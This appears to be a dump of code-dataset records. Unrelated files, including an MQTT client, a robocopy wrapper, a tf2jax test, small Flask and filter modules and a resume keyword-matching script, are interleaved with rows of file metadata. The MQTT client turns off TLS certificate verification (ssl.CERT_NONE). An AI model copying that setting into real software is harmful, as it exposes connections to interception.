                document.promptinput = self.inputstring
                self.stop(document)
            elif len(key) > 1:
                # key not supported
                pass
            else:
                self.inputstring += key
        else:
            raise NotImplementedError('To be done.')

    def start(self, doc):
        Mode.start(self, doc)
        doc.OnPrompt.fire(doc)

    def stop(self, doc):
        Mode.stop(self, doc)
        doc.OnPrompt.fire(doc)


def prompt(promptstring='>'):
    """Constructor for the prompt mode."""
    class PromptWithString(Prompt):
        def __init__(self, document, callback=None):
            Prompt.__init__(self, document, callback)
            self.promptstring = promptstring

    return PromptWithString
28.883721
55
0.573269
125
1,242
5.568
0.352
0.086207
0.091954
0.137931
0.25
0.16954
0.08046
0
0
0
0
0.001193
0.325282
1,242
42
56
29.571429
0.829356
0.041063
0
0.235294
0
0
0.016878
0
0
0
0
0
0
1
0.176471
false
0.029412
0.058824
0
0.323529
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8218206b49510d2a8ddd9239bbd0591e170620c6
482
py
Python
examples/osb/app/model/comment.py
medecau/lamson
e78520b857384462b9eecdedfc0f8c2e57cdd00a
[ "BSD-3-Clause" ]
null
null
null
examples/osb/app/model/comment.py
medecau/lamson
e78520b857384462b9eecdedfc0f8c2e57cdd00a
[ "BSD-3-Clause" ]
null
null
null
examples/osb/app/model/comment.py
medecau/lamson
e78520b857384462b9eecdedfc0f8c2e57cdd00a
[ "BSD-3-Clause" ]
null
null
null
from lamson import queue


def attach_headers(message, user_id, post_name, domain):
    """Headers are used later by the index.py handler to figure
    out where the message finally goes."""
    message['X-Post-Name'] = post_name
    message['X-Post-User-ID'] = user_id
    message['X-Post-Domain'] = domain


def defer_to_queue(message):
    index_q = queue.Queue("run/posts")  # use a diff queue?
    index_q.push(message)
    # lamson targets Python 2, hence the print statement
    print "run/posts count after defer", index_q.count()
30.125
73
0.697095
76
482
4.289474
0.526316
0.055215
0.110429
0
0
0
0
0
0
0
0
0
0.182573
482
15
74
32.133333
0.827411
0.03527
0
0
0
0
0.204986
0
0
0
0
0
0
0
null
null
0
0.111111
null
null
0.111111
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
82186e13305a89984ea44c868e824fbefce44ba3
1,677
py
Python
tf2jax/_src/numpy_compat_test.py
deepmind/tf2jax
fb5388656344a7e5bb8e5635e82a3d93c7bc9d8c
[ "Apache-2.0" ]
6
2022-03-18T12:09:11.000Z
2022-03-26T14:16:35.000Z
tf2jax/_src/numpy_compat_test.py
deepmind/tf2jax
fb5388656344a7e5bb8e5635e82a3d93c7bc9d8c
[ "Apache-2.0" ]
null
null
null
tf2jax/_src/numpy_compat_test.py
deepmind/tf2jax
fb5388656344a7e5bb8e5635e82a3d93c7bc9d8c
[ "Apache-2.0" ]
1
2022-03-18T12:09:23.000Z
2022-03-18T12:09:23.000Z
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf2jax."""

from absl.testing import absltest
from absl.testing import parameterized

import jax.numpy as jnp
import numpy as np
import tensorflow as tf

from tf2jax._src import numpy_compat

_dtypes = [
    tf.bool, tf.uint8, tf.uint16, tf.uint32, tf.uint64, tf.int8, tf.int16,
    tf.int32, tf.int64, tf.bfloat16, tf.float16, tf.float32, tf.float64,
    tf.complex64, tf.complex128
]


class NumpyCompatTest(parameterized.TestCase):

  @parameterized.named_parameters(
      ("np", np, numpy_compat.tf_to_np_dtypes),
      ("jnp", jnp, numpy_compat.tf_to_jnp_dtypes),
  )
  def test_dtype_conversion(self, np_module, dtype_map):
    self.assertEqual(len(_dtypes), len(dtype_map))
    for src in _dtypes:
      dst = "bool_" if src.name == "bool" else src.name
      if src.name == "bfloat16":
        self.assertIs(dtype_map[src], jnp.bfloat16)
      else:
        self.assertIs(dtype_map[src], getattr(np_module, dst))


if __name__ == "__main__":
  absltest.main()
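For context, `parameterized.named_parameters` expands each tuple into an independently named test case. A standalone sketch of the pattern (the `test_double` example is hypothetical, not from tf2jax):

from absl.testing import absltest, parameterized


class DoubleTest(parameterized.TestCase):

  # Runs as test_double_small and test_double_large; the first tuple
  # element becomes the test-name suffix, the rest become arguments.
  @parameterized.named_parameters(
      ("small", 2, 4),
      ("large", 10, 20),
  )
  def test_double(self, value, expected):
    self.assertEqual(value * 2, expected)


if __name__ == "__main__":
  absltest.main()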
33.54
80
0.692308
235
1,677
4.808511
0.510638
0.053097
0.023009
0.028319
0.040708
0
0
0
0
0
0
0.029286
0.165176
1,677
49
81
34.22449
0.777857
0.409064
0
0
0
0
0.030864
0
0
0
0
0
0.115385
1
0.038462
false
0
0.230769
0
0.307692
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
821984511dee58e92708aa60fa96d6d0d20fe0cf
2,918
py
Python
mqtt_interface/mqtt_library/mqtt_client_py3.py
bopopescu/docker_images_a
348d0982c5962f2ae34d10183ed9522b7a6fe286
[ "MIT" ]
2
2018-02-21T03:46:51.000Z
2019-12-24T16:40:51.000Z
mqtt_interface/mqtt_library/mqtt_client_py3.py
bopopescu/docker_images_a
348d0982c5962f2ae34d10183ed9522b7a6fe286
[ "MIT" ]
7
2020-07-16T19:54:08.000Z
2022-03-02T03:29:07.000Z
mqtt_interface/mqtt_library/mqtt_client_py3.py
bopopescu/docker_images_a
348d0982c5962f2ae34d10183ed9522b7a6fe286
[ "MIT" ]
2
2018-04-16T07:02:35.000Z
2020-07-23T21:57:19.000Z
import paho.mqtt.client as mqtt
import ssl
import redis
import time


class MQTT_CLIENT(object):

    def __init__(self, redis_site_data, server, port, user_name, password_key):
        self.server = server
        self.port = port
        self.redis_site_data = redis_site_data
        self.client = mqtt.Client(client_id="", clean_session=True, userdata=None, transport="tcp")
        self.client.tls_set(certfile="/home/pi/mosquitto/certs/client.crt",
                            keyfile="/home/pi/mosquitto/certs/client.key",
                            cert_reqs=ssl.CERT_NONE)
        redis_handle_pw = redis.StrictRedis(redis_site_data["host"],
                                            redis_site_data["port"],
                                            db=redis_site_data["redis_password_db"],
                                            decode_responses=True)
        self.client.username_pw_set(user_name, redis_handle_pw.hget(password_key, user_name))
        self.client.on_connect = self.on_connect
        self.client.on_publish = self.on_publish

    def connect(self):
        self.rc = -1
        self.client.connect(self.server, self.port, 60)
        self.client.loop_start()
        for i in range(0, 50):
            time.sleep(.1)
            if self.rc == 0:
                return True
        return False

    def loop(self, time):
        self.client.loop(time)

    def on_connect(self, client, userdata, flags, rc):
        print("on connect", flags, rc)
        self.rc = rc
        #self.client.loop_stop()

    def on_publish(self, client, userdata, mid):
        self.callback_flag = True
        self.mid_server = mid

    def disconnect(self):
        self.client.disconnect()
        self.client.loop_stop()

    def publish(self, topic, payload=None, qos=0, retain=False):
        self.callback_flag = False
        self.mid_server = -1
        self.client_result, self.mid_client = self.client.publish(topic, payload, qos, retain)
        if self.client_result != 0:
            return False, -1
        self.client.loop(5)
        for i in range(0, 50):
            time.sleep(.1)
            if self.callback_flag == True:
                # the publish succeeded only if the broker acknowledged
                # the same message id we sent
                if (self.mid_server == self.mid_client):
                    return True, 0
                else:
                    return False, -2
        return False, -3


if __name__ == "__main__":
    import json
    import time
    file_handle = open("../system_data_files/redis_server.json", 'r')
    data = file_handle.read()
    file_handle.close()
    redis_site_data = json.loads(data)
    # Note: the constructor also expects server, port, user_name and
    # password_key; this demo call only passes redis_site_data.
    mqtt_client = MQTT_CLIENT(redis_site_data)
    print(mqtt_client.connect())
    print("starting to publish")
    print(mqtt_client.publish("REMOTES/SLAVE:1/TEMPERATURE:Case", 72))
    while True:
        pass
32.422222
150
0.561343
349
2,918
4.472779
0.292264
0.108905
0.066624
0.021781
0.098655
0.038437
0.038437
0.038437
0.038437
0.038437
0
0.011911
0.338245
2,918
90
151
32.422222
0.796479
0.007882
0
0.090909
0
0
0.07344
0.049911
0
0
0
0
0
1
0.106061
false
0.060606
0.090909
0
0.30303
0.060606
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
8219bdf4aa36724d7acd9da5d6d73731f34ef6cd
979
py
Python
pyminer/network/filters.py
rbrecheisen/pyminer
c1b088cd9eddf0347b5c3e9354991374c7344a33
[ "Apache-2.0" ]
null
null
null
pyminer/network/filters.py
rbrecheisen/pyminer
c1b088cd9eddf0347b5c3e9354991374c7344a33
[ "Apache-2.0" ]
1
2015-05-15T12:06:25.000Z
2015-10-18T15:43:34.000Z
pyminer/network/filters.py
rbrecheisen/pyminer
c1b088cd9eddf0347b5c3e9354991374c7344a33
[ "Apache-2.0" ]
null
null
null
__author__ = 'Ralph'

import pandas as pd

from base import Node
from base import InputPort
from base import OutputPort


class Filter(Node):

    def __init__(self, name):
        super(Filter, self).__init__(name)
        self.add_input_port(
            InputPort(name='input', data_type=pd.DataFrame))
        self.add_output_port(
            OutputPort(name='output', data_type=pd.DataFrame))

    def execute(self):
        raise RuntimeError('Not implemented')


class FilterExamples(Filter):

    def __init__(self):
        super(FilterExamples, self).__init__('FilterExamples')
        self.set_required_config_items(['filter_type'])
        self._filter_types = ['all']

    def execute(self):
        self.check_config()
        data = self.get_input_port('input').get_data()
        if data is None:
            return
        self.get_output_port('output').set_data(data)


class FilterExampleRange(Filter):
    pass


class RemoveDuplicates(Filter):
    pass
20.395833
62
0.659857
116
979
5.232759
0.396552
0.039539
0.069193
0.062603
0
0
0
0
0
0
0
0
0.235955
979
48
63
20.395833
0.811497
0
0
0.137931
0
0
0.071429
0
0
0
0
0
0
1
0.137931
false
0.068966
0.137931
0
0.448276
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
821a8e57cdc8b71c46b5b924928e6ffbc5170020
329
py
Python
delphi/apps/rest_api/__init__.py
mwdchang/delphi
c6177f2d614118883eaaa7f5300f3e46f10ddc7e
[ "Apache-2.0" ]
null
null
null
delphi/apps/rest_api/__init__.py
mwdchang/delphi
c6177f2d614118883eaaa7f5300f3e46f10ddc7e
[ "Apache-2.0" ]
null
null
null
delphi/apps/rest_api/__init__.py
mwdchang/delphi
c6177f2d614118883eaaa7f5300f3e46f10ddc7e
[ "Apache-2.0" ]
1
2019-07-18T19:13:13.000Z
2019-07-18T19:13:13.000Z
from flask import Flask
from flask_sqlalchemy import SQLAlchemy

db = SQLAlchemy()


def create_app(debug=False):
    from delphi.apps.rest_api.api import bp

    app = Flask(__name__)
    app.config.from_object("delphi.apps.rest_api.config")
    app.debug = debug
    db.init_app(app)
    app.register_blueprint(bp)
    return app
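A hedged sketch of how an application factory like `create_app` is typically driven; the `run.py` name, port, and the `db.create_all()` call are assumptions, not taken from the delphi repo:

# run.py -- hypothetical entry point using the factory above.
from delphi.apps.rest_api import create_app, db

app = create_app(debug=True)

if __name__ == "__main__":
    with app.app_context():
        db.create_all()  # create tables for models bound to this app
    app.run(port=5000)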
21.933333
57
0.735562
49
329
4.714286
0.44898
0.077922
0.121212
0.147186
0
0
0
0
0
0
0
0
0.173252
329
14
58
23.5
0.849265
0
0
0
0
0
0.082067
0.082067
0
0
0
0
0
1
0.090909
false
0
0.272727
0
0.454545
0.090909
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
821e77dee58f0bcdb435a5eecbf66592783bf963
4,524
py
Python
rob/robocopy.py
dan-osull/rob
25f2781cc5124570a04a48b56ec7d7f802b0650b
[ "MIT" ]
3
2022-02-08T20:10:21.000Z
2022-02-08T20:18:54.000Z
rob/robocopy.py
dan-osull/rob
25f2781cc5124570a04a48b56ec7d7f802b0650b
[ "MIT" ]
null
null
null
rob/robocopy.py
dan-osull/rob
25f2781cc5124570a04a48b56ec7d7f802b0650b
[ "MIT" ]
null
null
null
import os
import subprocess
from dataclasses import dataclass
from pathlib import WindowsPath
from time import sleep
from typing import Optional, Sequence

from click import ClickException
from rich.progress import Progress

import rob.console as con
import rob.filesystem


@dataclass
class RobocopyResults:
    options: list[str]
    # Using Sequence because "list" and other mutable container types are
    # considered "invariant", so the contained type needs to match exactly.
    # https://github.com/microsoft/pyright/issues/130
    errors: Sequence[Optional[str]]
    stats: Sequence[Optional[str]]


def parse_robocopy_output(
    output: str,
) -> RobocopyResults:
    output_list = output.split("\n")
    output_list = [line for line in output_list if line]
    divider_idx = []
    for index, line in enumerate(output_list):
        # 50 chars long. Finds dividers in output, which are 78/79 chars.
        if "--------------------------------------------------" in line:
            divider_idx.append(index)
    options = output_list[divider_idx[1] + 1 : divider_idx[2]]
    if len(divider_idx) == 3:
        errors = output_list[divider_idx[2] + 1 :]
        stats = []
    else:
        errors = output_list[divider_idx[2] + 1 : divider_idx[3]]
        stats = output_list[divider_idx[3] + 1 :]
    return RobocopyResults(
        options=options,
        errors=errors,
        stats=stats,
    )


def run_robocopy(
    source: WindowsPath,
    target: WindowsPath,
    dir_size_bytes: Optional[int] = None,
    dry_run: bool = False,
    copy_permissions: bool = False,
    quiet=False,
) -> None:
    msg = f"Copying data from {con.style_path(source)} to {con.style_path(target)}"
    if not dir_size_bytes:
        dir_size_bytes = rob.filesystem.get_dir_size(source)
    if target.exists():
        con.print_(msg)
        raise ClickException(f"{target} already exists")
    if dry_run:
        con.print_(msg, end="")
        con.print_skipped()
        return
    if not quiet:
        con.print_(msg)
    robocopy_exe = (
        WindowsPath(os.environ["SystemRoot"])
        .joinpath("system32/robocopy.exe")
        .resolve()
    )
    robocopy_args = [
        str(robocopy_exe),
        str(source),
        str(target),
        "/E",    # copy subdirectories, including Empty ones.
        "/MT",   # Do multi-threaded copies with n threads (default 8).
        "/R:0",  # number of Retries on failed copies: default 1 million.
        "/NDL",  # No Directory List - don't log directory names.
        "/NFL",  # No File List - don't log file names.
        "/NP",   # No Progress - don't display percentage copied.
    ]
    if copy_permissions:
        robocopy_args.append(
            # /COPY flags: D=Data, A=Attributes, T=Timestamps, X=Skip alt data streams,
            # S=Security=NTFS ACLs, O=Owner info, U=aUditing info
            "/COPY:DATSO"
        )
    proc = subprocess.Popen(
        args=robocopy_args,
        stdout=subprocess.PIPE,
        # stderr included for completeness, robocopy doesn't seem to use it
        stderr=subprocess.STDOUT,
        text=True,
    )
    while proc.poll() is None:
        # "is None" so that returncode 0 breaks loop
        # 0: No errors occurred, and no copying was done.
        #    The source and destination directory trees are completely synchronized.
        # 1: One or more files were copied successfully (that is, new files have arrived).
        # https://ss64.com/nt/robocopy-exit.html
        if not quiet:
            with Progress(auto_refresh=False, transient=True) as progress:
                task_id = progress.add_task(
                    "[green]Copying data...[/green]", total=dir_size_bytes
                )
                progress.update(task_id, completed=rob.filesystem.get_dir_size(target))
                progress.refresh()
        sleep(2)
    output = proc.stdout.read()  # type: ignore
    # Exit code cannot be trusted as, for example, this error:
    # ERROR 5 (0x00000005) Copying NTFS Security to Destination Directory
    # ...can be present despite returncode 0, so let's look for errors ourselves
    robocopy_results = parse_robocopy_output(output)
    if robocopy_results.errors:
        raise ClickException(f"Robocopy: {str(robocopy_results.errors)}")
    if dir_size_bytes != rob.filesystem.get_dir_size(target):
        raise ClickException("Source and target folder sizes do not match. Aborting.")
    if not quiet:
        con.print_("[green]Data copy complete[/green]")
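To see how `parse_robocopy_output` slices on its dividers, here is a hedged sketch on a synthetic summary (the divider, option, and stat lines are fabricated stand-ins, not real robocopy output):

fake_output = "\n".join([
    "-" * 78,           # divider 0: header
    "   ROBOCOPY",
    "-" * 78,           # divider 1: options follow
    "  /E /MT /R:0",
    "-" * 78,           # divider 2: errors follow
    "-" * 78,           # divider 3: stats follow
    "  Files : 10 copied",
])
results = parse_robocopy_output(fake_output)
print(results.options)  # ['  /E /MT /R:0']
print(results.errors)   # [] -- nothing between dividers 2 and 3
print(results.stats)    # ['  Files : 10 copied']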
34.8
90
0.6355
566
4,524
4.971731
0.431095
0.031983
0.021322
0.028429
0.070007
0.057214
0.044776
0.024876
0
0
0
0.012496
0.257073
4,524
129
91
35.069767
0.824755
0.270115
0
0.050505
0
0
0.111009
0.045441
0
0
0
0
0
1
0.020202
false
0
0.10101
0
0.181818
0.050505
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
821f4a58cdad24897457c7d61f286692df08d3ee
31,892
py
Python
code/resumesearch.py
outreachy/creative-works-and-scripts
8cac43a649aefaa793b91ac34ef73e20194ca22a
[ "CC-BY-4.0" ]
27
2019-07-18T04:44:29.000Z
2022-02-15T21:15:09.000Z
code/resumesearch.py
outreachy/creative-works-and-scripts
8cac43a649aefaa793b91ac34ef73e20194ca22a
[ "CC-BY-4.0" ]
5
2019-08-08T21:15:39.000Z
2022-02-22T01:38:55.000Z
code/resumesearch.py
outreachy/creative-works-and-scripts
8cac43a649aefaa793b91ac34ef73e20194ca22a
[ "CC-BY-4.0" ]
13
2020-01-13T11:38:45.000Z
2022-01-25T17:48:29.000Z
#!/usr/bin/env python3
#
# Copyright 2017 Sarah Sharp <sharp@otter.technology>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
# This script attempts to match skillset keywords in resumes with
# Outreachy projects. The skillset keyword lists are based on the
# Outreachy project list at:
# https://wiki.gnome.org/Outreachy/2017/MayAugust
#
# This program expects you to have created a directory with identically
# named PDF and text resume files. You can translate PDF files to text with:
# $ for i in `ls *.pdf`; do pdftotext $i; done

import argparse
import csv
import os
import re
import textwrap
#from fuzzywuzzy import fuzz
from enum import Enum
from collections import Counter
from shutil import copyfile


class outreachyProject:
    """Outreachy project name, description, keywords, and matching resume storage."""
    def __init__(self, name, short, description, keywords, printskip):
        self.name = name
        self.description = description
        self.keywords = keywords
        self.strongResumeMatches = []
        self.weakResumeMatches = []
        self.short = short
        self.printskip = printskip


class resumeFile:
    """Information relating to a text and pdf resume pair."""
    def __init__(self, path, textFileName, contents):
        self.path = path
        self.textFileName = textFileName
        self.pdfFileName = os.path.splitext(textFileName)[0] + '.pdf'
        self.contents = contents
        self.emails = re.findall(r'[\w\.-\_\+]+@[\w\.-]+', contents)
        self.strongProjectMatches = []
        self.weakProjectMatches = []


def readResumeFiles(directory):
    resumeFiles = []
    for f in [l for l in os.listdir(directory)
              if l.endswith('.txt') and not l.endswith('-email.txt')
              and not l.endswith('-email-tam.txt')]:
        with open(os.path.join(directory, f), 'r') as resume:
            contents = resume.read()
            resumeFiles.append(resumeFile(directory, f, contents))
    #print("Found", len(resumeFiles), "resume files")
    for r in resumeFiles:
        if len(r.emails) == 0:
            continue
        line = r.pdfFileName
        for email in r.emails:
            line = line + ' ' + email
        line = line + ' ' + str(len(r.contents))
    # The first email is usually the actual email.
    emails = [resume.emails[0] for resume in resumeFiles if resume.emails]
    edups = [item for item, count in Counter(emails).items() if count > 1]
    for email in edups:
        pdfs = [resume.pdfFileName for resume in resumeFiles
                if resume.emails and resume.emails[0] == email]
        print('Email duplicate:', email, ' '.join(pdfs))
    return resumeFiles


def searchForEmail(csvFile, resumeFiles):
    with open(csvFile, 'r') as csvFile:
        freader = csv.DictReader(csvFile, delimiter=',', quotechar='"')
        boothstops = []
        for row in freader:
            # Create a list of potential matches for the email we have.
            # Search through the list of emails in each PDF.
            # Use fuzzywuzzy to do a fuzzy search in case we misread an email.
            # No difference between pure match when I tried this, and going
            # down to 80 only added false positives
            #m = [r for r in resumeFiles if len([email for email in r.emails if fuzz.ratio(row['Email'], email) > 90]) != 0]
            m = [r for r in resumeFiles if row['Email'] in r.emails]
            if len(m) == 0:
                continue
            files = set()
            for resume in m:
                files.add(resume.pdfFileName)
            boothstops.append((row['Email'], list(files)))
    return boothstops


projectsMay2017 = [
    #outreachyProject('Outreachy',
    #    ['open source', 'free software', 'Linux', 'Unix', 'Solaris']),
    outreachyProject('Cadasta', 'a property rights tool',
        'enhance user settings and create a user dashboard',
        ['django'], []),
    outreachyProject('Cadasta', 'a property rights tool',
        'add new login options',
        ['django|oauth'], []),
    outreachyProject('Cadasta', 'a property rights tool',
        'improve automated test coverage',
        ['selenium'], []),
    outreachyProject('Ceph', 'a network filesystem',
        'create a root cause analysis tool for Linux distributed systems',
        ['linux', 'distributed systems'], ['linux', 'distributed systems']),
    outreachyProject('Ceph', 'a network filesystem',
        'evaluate the performance of new reweight algorithms for balancing storage utilization',
        ['statistics', 'storage', 'linux'], ['statistics', 'storage', 'linux']),
    outreachyProject('Ceph', 'a network filesystem',
        'design a status dashboard to visualize Ceph cluster statistics',
        ['python', 'linux', 'javascript', 'html5', 'css3'], []),
    outreachyProject('Ceph', 'a network filesystem',
        'identify performance degradation in nodes and automate cluster response',
        ['Linux', 'python', 'distributed systems'], []),
    outreachyProject('Ceph', 'a network filesystem',
        'design a simplified database backend for the Ceph Object Gateway',
        ['database', 'Linux', 'C\+\+'], ['database']),
    outreachyProject('Ceph', 'a network filesystem',
        'port tests written in multiple languages to test the Amazon S3 storage protocol and Openstack Swift storage',
        ['python', 'linux', 'storage'], ['storage']),
    outreachyProject('Debian', 'a Linux distribution',
        'benchmark scientific packages for general and architecture specific builds',
        ['linux', 'gcc'], ['linux']),
    outreachyProject('Debian', 'a Linux distribution',
        'improve the Debian test database and website',
        ['linux', 'python', 'sql', 'shell|bash|command-line'], ['linux', 'command-line']),
    outreachyProject('Debian', 'a Linux distribution',
        'enhance the Debian test website',
        ['html', 'css', 'linux', 'graphic'], ['linux', 'graphic']),
    outreachyProject('Debian', 'a Linux distribution',
        'Add secure mail server support to FreedomBox (a web server for small machines)',
        ['python', 'django', 'shell|bash|command-line'], ['command-line']),
    outreachyProject('Discourse', 'chat forum software',
        'enhance their forum and chat web services',
        ['rails', 'javascript|ember.js'], []),
    outreachyProject('Fedora', 'a Linux distribution',
        'create a coloring book to explain technical concepts',
        ['inkscape|scribus|storyboard|storyboarding|graphic design'],
        ['graphic design', 'storyboard', 'storyboarding']),
    outreachyProject('Fedora', 'a Linux distribution',
        'improve Bodhi, the web-system that publishes updates for Fedora',
        ['python', 'javascript|html|css|linux|fedora'], []),
    outreachyProject('GNOME', None,
        'improve the recipes or maps applications',
        ['gtk'], []),
    outreachyProject('Lagome', 'a microservices platform',
        "create an online auction sample app to showcase Lagome's microservices",
        ['java', 'scala|react|reactive'], ['react', 'reactive']),
    outreachyProject('Linux kernel', None,
        'analyze memory resource release operators and fix Linux kernel memory bugs',
        ['linux', 'operating systems', 'memory'], ['linux', 'operating systems', 'memory']),
    outreachyProject('Linux kernel', None,
        'improve process ID allocation',
        ['linux', 'operating systems', 'kernel'], ['linux', 'operating systems', 'kernel']),
    outreachyProject('Linux kernel', None,
        'improve nftables (an in-kernel network filtration tool)',
        ['linux', 'operating systems', 'networking'], ['linux', 'operating systems', 'networking']),
    outreachyProject('Linux kernel', None,
        'write a driver for a sensor using the Industrial I/O interface',
        ['linux', 'operating systems|robotics|embedded', 'C\+\+|C(?!\+\+)'],
        ['linux', 'operating systems', 'robotics', 'embedded', 'c++']),
    outreachyProject('Linux kernel', None,
        'improve documentation build system and translate docs into ReStructured Text format',
        ['perl', 'python', 'operating systems'], ['operating systems']),
    outreachyProject('Mozilla', None, None,
        ['mozilla|firefox'], ['mozilla', 'firefox']),
    outreachyProject('OpenStack', 'software for cloud deployment and management',
        'add continuous integration for OpenStack Identity Service (keystone) LDAP support',
        ['python', 'shell|bash|command-line'], ['command-line']),
    outreachyProject('oVirt', 'virtualization management software',
        'implement oVirt integration tests using Lago and the oVirt REST API',
        ['python', 'rest'], ['rest']),
    outreachyProject('oVirt', 'virtualization management software',
        'design an oVirt log analyzer for distributed systems',
        ['python', 'linux', 'distributed systems'], ['distributed systems']),
    outreachyProject('oVirt', 'virtualization management software',
        'rewrite oVirt UI dialogs in modern JavaScript technologies',
        ['es6|react|redux'], []),
    outreachyProject('QEMU', 'hardware virtualization software',
        'rework the QEMU audio backend',
        ['C(?!\+\+)', 'audio'], ['audio']),
    outreachyProject('QEMU', 'hardware virtualization software',
        'create a full and incremental disk backup tool',
        ['C(?!\+\+)', 'python', 'storage'], ['storage']),
    outreachyProject('QEMU', 'hardware virtualization software',
        "refactor the block layer's I/O throttling and write notifiers",
        ['C(?!\+\+)', 'storage'], ['storage']),
    outreachyProject('QEMU', 'hardware virtualization software',
        "code an emulated PCIe-to-PCI bridge",
        ['pci|pcie'], ['pci', 'pcie']),
    outreachyProject('QEMU', 'hardware virtualization software',
        "add x86 virtualization support on macOS using Hypervisor.framework",
        ['C(?!\+\+)', 'mac', 'virtualization'], ['mac', 'virtualization']),
    outreachyProject('QEMU', 'hardware virtualization software',
        "extend the current vhost-pci based inter-VM communication",
        ['C(?!\+\+)', 'pci'], ['pci']),
    outreachyProject('Sugar Labs', 'a software-development and learning community',
        'improve Music Blocks, an application for exploring fundamental musical concepts',
        ['javascript|JS', 'music'], ['music']),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'write a Zotero translator and document the process',
        ['javascript', 'documentation'], ['documentation']),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'improve and fix bugs in the quiz extension',
        ['php', 'documentation'], ['documentation']),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'create user guides to help with translation outreach',
        ['translation|localization'], ['translation', 'localization']),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'implement automatic edits on wikis connected to the Programs & Events Dashboard',
        ['rails'], []),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'implement an automatic article feedback feature for the Programs & Events Dashboard',
        ['rails'], []),
    outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
        'implement a resource editor and dialog editor',
        ['C(?!\+\+)', 'Windows', 'UI|UX'], ['windows', 'ui', 'ux']),
    outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
        'implement missing D3DX9 APIs',
        ['C(?!\+\+)', 'computer graphics'], []),
    outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
        'implement Direct3D microbenchmarks',
        ['C(?!\+\+)', 'opengl'], []),
    outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
        'create automated game benchmarks',
        ['C(?!\+\+)', 'game engine'], ['game engine']),
    outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
        'port WineLib to a new architecture (such as PPC64, Sparc64, RISC-V, or x32)',
        ['PPC|PowerPC|Sparc|Sparc64|RISC-V'],
        ['ppc', 'powerpc', 'sparc', 'sparc64', 'risc-v']),
    outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
        'improve the AppDB website, which lists Wine support for Windows programs',
        ['php', 'html', 'mysql'], []),
    outreachyProject('Xen Project', 'a virtualization platform',
        'create golang bindings for libxl on the Xen hypervisor',
        ['go', 'C(?!\+\+)'], []),
    outreachyProject('Xen Project', 'a virtualization platform',
        'create rust bindings for libxl on the Xen hypervisor',
        ['rust'], ['rust']),
    outreachyProject('Xen Project', 'a virtualization platform',
        'enhance the KDD (Windows Debugger Stub) for the Xen hypervisor',
        ['C(?!\+\+)', 'windows', 'kernel|debugger'], ['windows', 'debugger']),
    outreachyProject('Xen Project', 'a virtualization platform',
        'fuzz test the Xen hypercall interface',
        ['C(?!\+\+)', 'assembly', 'gcc'], []),
    outreachyProject('Xen Project', 'a virtualization platform',
        'improve Mirage OS, a unikernel that runs on top of Xen',
        ['ocaml'], []),
    outreachyProject('Xen Project', 'a virtualization platform',
        'create a Xen code review dashboard',
        ['sql', 'javascript', 'html5', 'java'], []),
    #outreachyProject('Xen Project', 'a virtualization platform',
    #    'implement tools for code standards checking using clang-format',
    #    ['clang']),
    outreachyProject('Xen Project', 'a virtualization platform',
        'add more FreeBSD testing to osstest',
        ['freebsd|bsd|openbsd|netbsd|dragonfly'],
        ['freebsd', 'bsd', 'openbsd', 'netbsd', 'dragonfly']),
    outreachyProject('Yocto', 'a tool for creating embedded Linux distributions',
        'improve and document the Yocto autobuilder',
        ['C(?!\+\+)', 'python', 'distro|linux|yocto|openembedded',
         'embedded|robotics|beaglebone|beagle bone|minnow|minnowboard|arduino'],
        ['distro', 'linux', 'yocto', 'embedded', 'robotics', 'beaglebone',
         'beagle bone', 'minnow', 'minnowboard', 'arduino']),
]


# We have two types of resumes:
# 1. They matched *some* but not all of the important keywords for a project.
# 2. They matched all of the keywords we need.
def matchResumes(resumeFiles):
    for resume in resumeFiles:
        for project in projectsMay2017:
            matches = [set(re.findall(r'\b(?:' + keyword + r')\b',
                                      resume.contents, flags=re.IGNORECASE))
                       for keyword in project.keywords]
            # New syntax for me!
            # * takes a list and expands it to arguments to a function.
            # ** takes a dictionary and expands it to key-value arguments to a function.
